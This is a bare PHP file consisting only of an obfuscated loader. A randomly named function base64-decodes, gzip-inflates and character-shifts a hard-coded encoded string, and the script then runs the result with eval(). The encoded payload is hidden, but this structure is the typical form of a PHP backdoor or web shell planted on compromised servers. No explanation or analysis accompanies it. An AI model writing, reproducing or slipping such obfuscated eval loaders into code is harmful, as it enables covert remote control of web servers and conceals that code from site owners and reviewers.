<?php function wqGY($kFrSMf)
{ 
$kFrSMf=gzinflate(base64_decode($kFrSMf));
 for($i=0;$i<strlen($kFrSMf);$i++)
 {
$kFrSMf[$i] = chr(ord($kFrSMf[$i])-1);
 }
 return $kFrSMf;
 }eval(wqGY("U1QEAu7itKKyrOI0RQ19fQOXguI0g7ykrHz9wsxCDRtMueKCstK0YqisgQGGfGlScm5aWWFqUmkaVJGDPQA="));?>